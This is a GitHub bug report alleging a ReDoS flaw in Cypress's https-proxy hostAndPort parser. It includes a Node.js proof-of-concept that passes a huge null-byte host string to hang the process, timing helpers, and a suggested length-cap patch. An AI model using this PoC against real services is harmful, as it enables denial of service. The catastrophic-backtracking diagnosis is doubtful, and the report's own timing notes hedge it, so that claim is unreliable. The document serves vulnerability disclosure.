ReDoS Vulnerability in https-proxy/lib/util/parse.js

Open ShiyuBanzhou opened this issue 5 months ago • 0 comments

Current behavior

A regular expression in packages/https-proxy/lib/util/parse.js is susceptible to Regular Expression Denial of Service (ReDoS). By providing a specially crafted, very long string as a hostname, it is possible to cause the Node.js process to consume 100% CPU and become unresponsive. This is due to catastrophic backtracking in the vulnerable regular expression.

The vulnerability exists in the hostAndPort function, specifically with the hostAndPortRegex.

Desired behavior

The hostAndPort function should be able to handle malformed or malicious host strings without causing the application to hang, effectively mitigating the Denial of Service vector.

Test code to reproduce

The following proof of concept (PoC) demonstrates the vulnerability. Running this script will cause the process to hang indefinitely.

// PoC for ReDoS in @cypress/https-proxy
// Save this as `poc.js` and run `node poc.js`

const path = require('path');
// Note: Adjust the path to the 'parse.js' file based on your project structure.
// This assumes you are running from the root of a cloned cypress repository.
const parse = require(path.join(process.cwd(), 'packages/https-proxy/lib/util/parse.js'));

console.log('Crafting malicious input...');
// A long string of null bytes in the host section of the URL.
const maliciousUrl = 'http://' + '\u0000'.repeat(100000) + '/\n/\n';
console.log('Malicious URL length:', maliciousUrl.length);

console.log('Calling vulnerable function parse.hostAndPort()...');
console.log('If the script hangs here, the ReDoS is successful.');

// The `url.parse` inside `hostAndPort` will extract the malicious host,
// which is then passed to the vulnerable regex.
parse.hostAndPort(maliciousUrl, {}, 80);

// This line will never be reached.
console.log('This message will not be printed.');
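
Because the script is expected to hang, it can be more convenient to launch it in a child process with a time limit instead of running it directly. The following is a minimal sketch and not part of the original report: `runWithTimeout` and the 5-second limit are hypothetical choices, and the usage line assumes the PoC was saved as `poc.js` in the current directory.

```javascript
const { spawnSync } = require('child_process');

// Hypothetical helper: run `node <args>` in a child process and report
// whether it finished within `timeoutMs` milliseconds.
function runWithTimeout(args, timeoutMs) {
  const started = Date.now();
  const result = spawnSync(process.execPath, args, {
    timeout: timeoutMs, // the child is killed once this limit is exceeded
    encoding: 'utf8',
  });
  // On a timeout, spawnSync reports an error whose code is 'ETIMEDOUT'.
  const timedOut = Boolean(result.error && result.error.code === 'ETIMEDOUT');
  return { timedOut, elapsedMs: Date.now() - started, stdout: result.stdout };
}

// Usage (assumes poc.js exists in the current directory):
//   const { timedOut, elapsedMs } = runWithTimeout(['poc.js'], 5000);
//   console.log(timedOut ? 'PoC was still running at the limit' : `PoC exited after ${elapsedMs} ms`);
```

A `timedOut` value of `true` means the PoC was still running when the limit expired. `false` means the child exited on its own, whether successfully or with an error, so `stdout` and `elapsedMs` are worth checking in that case.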

Other

The vulnerable regular expression is:

const hostAndPortRegex = /^([^:]+)(:([0-9]+))?$/;

When the host variable, extracted from the input URL, is a very long string without any colons, the ([^:]+) part of the regex experiences catastrophic backtracking.
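
The regex can also be exercised in isolation, which helps separate its cost from the rest of `hostAndPort`. The sketch below times `exec()` on hosts of growing length. `timeRegex` and the chosen lengths are hypothetical, and no particular timings are claimed here. The point is to observe how the elapsed time scales as the input grows, for both a host with no colon and a host whose trailing `:x` forces the overall match to fail.

```javascript
// The regex quoted in this report.
const hostAndPortRegex = /^([^:]+)(:([0-9]+))?$/;

// Hypothetical helper: time a single exec() call on `input`.
function timeRegex(input) {
  const start = process.hrtime.bigint();
  const match = hostAndPortRegex.exec(input);
  const elapsedMs = Number(process.hrtime.bigint() - start) / 1e6;
  return { matched: match !== null, elapsedMs };
}

// Candidate hosts of growing length: one with no colon at all, and one
// whose trailing ":x" cannot be parsed as a port, so the match fails.
for (const n of [1000, 10000, 100000]) {
  const noColon = timeRegex('\u0000'.repeat(n));
  const badPort = timeRegex('\u0000'.repeat(n) + ':x');
  console.log(n, noColon, badPort);
}
```

If the elapsed time grows roughly in proportion to the input length, the regex alone is unlikely to explain an indefinite hang, and the surrounding code path deserves a closer look. Much faster growth would be consistent with catastrophic backtracking.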

Recommendation:

The most robust solution is not to "fix" the regex itself, but to keep it from processing dangerously long inputs. Checking the length of the host before executing the regex is a simple and widely used mitigation for ReDoS.

Here is a suggested diff:

--- a/packages/https-proxy/lib/util/parse.js
+++ b/packages/https-proxy/lib/util/parse.js
@@ -28,6 +28,12 @@
   // does it have a port?
   // pull it out if so
   const { host } = url.parse(urlStr);
+
+  // Add a length limit to the host to prevent ReDoS attacks.
+  // Valid DNS hostnames are at most 253 characters, so 4096 is a generous cap.
+  if (host && host.length > 4096) {
+    return null;
+  }
 
   const match = hostAndPortRegex.exec(host);
 

This approach is simple and cheap, and it bounds the worst-case running time of the regex without altering the regex logic.
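
The length check from the suggested diff can be sketched as a standalone function for experimentation. This is an illustration under stated assumptions, not the actual `hostAndPort` implementation: `splitHostAndPort` and `MAX_HOST_LENGTH` are hypothetical names, the cap of 4096 is taken from the diff, and returning `null` for rejected input follows the diff without confirming that existing callers handle it.

```javascript
// The regex quoted in this report.
const hostAndPortRegex = /^([^:]+)(:([0-9]+))?$/;

// Assumed cap, taken from the suggested diff; not an official limit.
const MAX_HOST_LENGTH = 4096;

// Hypothetical stand-in for the guarded part of hostAndPort(): returns
// { host, port }, or null when the input is missing, too long, or malformed.
function splitHostAndPort(host, defaultPort) {
  if (typeof host !== 'string' || host.length > MAX_HOST_LENGTH) {
    return null; // rejected before the regex ever runs
  }
  const match = hostAndPortRegex.exec(host);
  if (!match) {
    return null;
  }
  return {
    host: match[1],
    // Group 3 holds the digits after the colon, if a port was given.
    port: match[3] ? Number(match[3]) : defaultPort,
  };
}

console.log(splitHostAndPort('example.com:8443', 80));
console.log(splitHostAndPort('example.com', 80));
console.log(splitHostAndPort('a'.repeat(5000), 80));
```

The first two calls return a `{ host, port }` object and the third returns `null` because the input exceeds the cap. Since the length check is a constant-time comparison, oversized input costs almost nothing to reject.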

ShiyuBanzhou • Jul 05 '25 03:07